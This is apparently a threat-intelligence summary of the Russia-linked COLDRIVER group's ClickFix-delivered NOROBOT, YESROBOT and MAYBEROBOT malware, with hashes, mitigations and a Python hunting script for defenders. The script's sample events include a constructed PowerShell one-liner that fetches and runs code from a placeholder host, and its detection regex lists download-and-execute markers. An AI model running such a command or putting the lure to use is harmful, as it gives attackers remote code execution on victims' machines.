Full Report
Newly identified malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased "operations tempo" from the threat actor. The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew rapidly refined and retooled its malware arsenal merely five days following
Analysis Summary
# Threat Actor: COLDRIVER
## Attribution & Identity
Russia-linked, state-sponsored hacking group. GTIG attributes three newly identified malware families to the actor: NOROBOT, YESROBOT, and MAYBEROBOT. Two of them are tracked by Zscaler ThreatLabz under different names: NOROBOT as BAITSWITCH and MAYBEROBOT as SIMPLEFIX.
## Activity Summary
Since May 2025, the actor has shown an increased "operations tempo," rapidly moving from the previously reported LOSTKEYS malware to the new "ROBOT" family. Attacks in January, March, and April 2025 deployed the LOSTKEYS information stealer. Subsequent intrusions have used the new family, delivered through ClickFix-style lures: a fake CAPTCHA verification prompt instructs the user to paste and run a malicious PowerShell command in the Windows Run dialog. YESROBOT was observed only briefly in late May, suggesting it was a "stopgap mechanism" before the actor switched to the more capable MAYBEROBOT.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Leveraging ClickFix lures, causing users to run malicious PowerShell commands via the Windows Run dialog prompt (fake CAPTCHA verification).
- **Delivery Mechanism:** Initial infection chain uses an HTML lure dubbed COLDCOPY to drop a DLL called NOROBOT, which is executed via `rundll32.exe` to trigger the next-stage malware.
- **Malware Evolution:** The delivery chain is continually reworked; in later versions the cryptographic key needed to decrypt the next stage is split across stages, so a single captured component is not enough to recover the payload, hindering analysis and detection.
- **Evasion:** Early NOROBOT versions installed Python 3.8 to run the YESROBOT backdoor; the actor abandoned this as "noisy" in favour of less conspicuous, PowerShell-based tooling (MAYBEROBOT).
- **Command and Control (C2):** YESROBOT uses HTTPS to retrieve commands from a hard-coded C2 server. MAYBEROBOT supports downloading/running payloads from specified URLs and executing commands via `cmd.exe` and PowerShell.
- [The text does not explicitly mention MITRE ATT&CK IDs.]
## Targeting
- Sectors: Historically targeted high-profile individuals in NGOs, policy advisors, and dissidents for credential theft. The current activity appears focused on "significant targets."
- Geography: Not explicitly mentioned, but attribution is to a Russian state-sponsored group.
- Victims: Specific organizations were not detailed, only the types of profiles targeted historically (NGOs, policy advisors, dissidents).
## Tools & Infrastructure
- **Malware Families:**
  - LOSTKEYS: information stealer deployed in the January, March, and April 2025 waves
  - NOROBOT: DLL dropped by the COLDCOPY lure and executed via `rundll32.exe` to stage the next payload (tracked as BAITSWITCH by Zscaler ThreatLabz)
  - YESROBOT: Python backdoor, deployed briefly in late May 2025
  - MAYBEROBOT: PowerShell implant that replaced YESROBOT (tracked as SIMPLEFIX by Zscaler ThreatLabz)
- **C2:** YESROBOT retrieves commands over HTTPS from a hard-coded C2 server. MAYBEROBOT downloads and runs payloads from operator-specified URLs and executes commands via `cmd.exe` and PowerShell.
- **File hashes (64-character SHA-256 length, as listed in the source):**
  - COLDCOPY (HTML lure, initial dropper): `c4d0fba5aaafa40aef6836ed1414ae3eadc390e1969fdcb3b73c60fe7fb37897`
  - NOROBOT (DLL): `2e74f6bd9bf73131d3213399ed2f669edf8ce8196cd70eb6aee` (truncated in the source at 51 hex characters; a full SHA-256 has 64, so confirm the value against the GTIG report before using it for matching)
  - YESROBOT (Python backdoor): `bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f`
  - MAYBEROBOT (PowerShell implant): `b60100729de2f468caf686638ad513fe28ce61590d2b0d8db85af9edc5da98f9`
## Implications
COLDRIVER demonstrates high operational speed and adaptability, rapidly iterating on malware (five days between reporting LOSTKEYS and deploying new families) to counter detection following public disclosure. The evolution towards the more flexible MAYBEROBOT suggests a focus on persistent, deep intelligence gathering against high-value targets.
## Mitigations
- Alert on `powershell.exe` or `pwsh.exe` spawned directly by `explorer.exe` with download-and-execute or hidden-window arguments; this is the process lineage produced when a user pastes a ClickFix command into the Windows Run dialog after a CAPTCHA-style lure. During forensics, the Run dialog's history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` corroborates that the command was typed by the user.
- Scrutinize `rundll32.exe` executions whose command line references a DLL in a user-writable location (AppData, Temp, Downloads) rather than a system directory, the pattern used to run the NOROBOT DLL.
- Deploy enhanced security measures and user awareness training covering phishing lures that impersonate browser or CAPTCHA verification and ask the user to run a command.
- Alert on unexpected Python installer executions (early NOROBOT builds installed Python 3.8 to run the YESROBOT backdoor), particularly when the installer is launched by `rundll32.exe`, `powershell.exe`, or `cmd.exe` rather than by a user or software-deployment tool.
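The following script turns the execution chain described under Tactics, Techniques & Procedures and the monitoring points listed under Mitigations into three hunting rules run over Sysmon-style process-creation events (Event ID 1 fields `Image`, `ParentImage`, `CommandLine`). It is an added example, not GTIG or Zscaler tooling; the sample events, paths and the `captcha-check.example` host are constructed for illustration and are not indicators from the report.

```python
"""Hunting rules for the COLDRIVER ClickFix -> NOROBOT -> YESROBOT/MAYBEROBOT
chain, evaluated over Sysmon-style process-creation events.
Added example; the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # Sysmon Image: full path of the created process
    parent_image: str   # Sysmon ParentImage: full path of the parent process
    command_line: str   # Sysmon CommandLine of the created process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Download/execute and hide-window switches typical of ClickFix one-liners.
CLICKFIX_MARKERS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|\birm\b"
    r"|invoke-expression|invoke-webrequest|downloadstring|net\.webclient)",
    re.IGNORECASE,
)

# DLL locations a user (and therefore a dropper) can write to.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)|ProgramData|Temp|Public)\\",
    re.IGNORECASE,
)

SHELLS = {"powershell.exe", "pwsh.exe"}


def is_run_dialog_powershell(ev: ProcEvent) -> bool:
    """ClickFix: the user pastes into Win+R, so explorer.exe is the direct parent
    of PowerShell and the command line carries download/hidden-window switches."""
    return (basename(ev.image) in SHELLS
            and basename(ev.parent_image) == "explorer.exe"
            and CLICKFIX_MARKERS.search(ev.command_line) is not None)


def is_suspicious_rundll32(ev: ProcEvent) -> bool:
    """NOROBOT stage: rundll32.exe loading a DLL from a user-writable path."""
    return (basename(ev.image) == "rundll32.exe"
            and USER_WRITABLE.search(ev.command_line) is not None)


def is_unexpected_python_installer(ev: ProcEvent) -> bool:
    """Early NOROBOT builds installed Python 3.8 to run YESROBOT; a Python
    installer spawned by rundll32/PowerShell/cmd is out of place."""
    return (re.match(r"python-3(\.\d+)*.*\.exe$", basename(ev.image)) is not None
            and basename(ev.parent_image) in SHELLS | {"rundll32.exe", "cmd.exe"})


RULES = [
    ("clickfix_run_dialog_powershell", is_run_dialog_powershell),
    ("rundll32_user_writable_dll", is_suspicious_rundll32),
    ("unexpected_python_installer", is_unexpected_python_installer),
]


def hunt(events):
    """Return (rule_name, process, command_line) for every rule hit."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, basename(ev.image), ev.command_line))
    return hits


# Constructed sample events: three stages of the described chain plus two benign
# events that exercise the rules' negative paths. Hostnames and paths are hypothetical.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -c "iex (irm https://captcha-check.example/verify)"'),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\update.dll,Entry"),
    ProcEvent(r"C:\Users\alice\Downloads\python-3.8.10-amd64.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"python-3.8.10-amd64.exe /quiet InstallAllUsers=0"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",            # benign: system DLL
              r"C:\Windows\System32\svchost.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Vendor\agent.exe",            # benign: not from explorer
              r"powershell.exe -File C:\Program Files\Vendor\inventory.ps1"),
]


if __name__ == "__main__":
    for name, proc, cmd in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {proc}: {cmd}")
```

The rules are deliberately conservative: a PowerShell launch is flagged only with `explorer.exe` as the parent and a download or hidden-window marker present, which keeps scheduled and vendor-launched scripts out of the alert queue; tune `USER_WRITABLE` to your environment's software-distribution paths before deploying the `rundll32.exe` rule.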